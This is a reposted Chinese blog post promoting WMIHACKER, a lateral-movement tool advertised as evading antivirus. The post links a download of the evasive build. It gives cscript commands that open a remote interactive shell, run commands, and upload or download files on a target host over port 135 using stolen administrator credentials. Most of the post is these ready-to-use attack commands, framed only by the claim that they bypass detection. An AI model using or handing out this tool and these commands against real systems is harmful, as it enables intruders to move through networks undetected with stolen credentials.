免杀横向移动工具WMIHACKER
生活随笔
收集整理的這篇文章主要介紹了
免杀横向移动工具WMIHACKER
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
免殺橫向移動工具WMIHACKER
- 交互式Shell
- 命令執(zhí)行
- 文件上傳
- 文件下載
免殺橫向滲透遠程命令執(zhí)行,常見的WMIEXEC、PSEXEC執(zhí)行命令是創(chuàng)建服務或調用Win32_Process.create執(zhí)行命令,這些方式都已經被殺軟100%攔截,通過改造出WMIHACKER免殺橫向移動測試工具。
其通過135端口進行命令執(zhí)行,執(zhí)行的結果讀取以及無需445端口進行文件傳輸。此工具利用的前提條件是: 獲取到目標主機的賬戶密碼
可能會有人問既然我都拿到主機的賬號密碼,我遠程直接登錄不香嗎?那遠程桌面連接是不是需要開啟3389端口,如果目標主機沒有開啟3389端口呢?那我使用此款工具是不是可以通過135端口就能實現(xiàn)命令執(zhí)行,而且還可以實現(xiàn)文件上傳/下載功能,同時還免殺。
免殺工具下載:https://wwe.lanzous.com/iCZOieai3sd
項目地址:https://github.com/360-Linton-Lab/WMIHACKER
以下 xx.xx.xx.xx 即目標主機內網(wǎng)IP地址
交互式Shell
# 獲取交互式Shell cscript WMIHACKER_0.6.vbs /shell xx.xx.xx.xx administrator "Password!"命令執(zhí)行
# 有命令回顯執(zhí)行方式 cscript WMIHACKER_0.6.vbs /cmd xx.xx.xx.xx administrator "Password!" "ipconfig" 1# 無命令回顯執(zhí)行方式 cscript WMIHACKER_0.6.vbs /cmd xx.xx.xx.xx administrator "Password!" "ipconfig > c:\1.txt" 0文件上傳
# 復制本機calc.exe到遠程主機c:\calc.exe cscript wmihacker_0.4.vbe /upload xx.xx.xx.xx administrator "Password!" "c:\windows\system32\calc.exe" "c:\calc"文件下載
# 下載遠程主機calc.exe到本地c:\calc.exe cscript wmihacker_0.4.vbe /download xx.xx.xx.xx administrator "Password!" "c:\calc" "c:\windows\system32\calc.exe"我是為了好好偷懶才非常努力的XXR,See You Next Time.
總結
以上是生活随笔為你收集整理的免杀横向移动工具WMIHACKER的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 测试人,测试魂,3年测遍32个城,主管的
- 下一篇: Error connecting to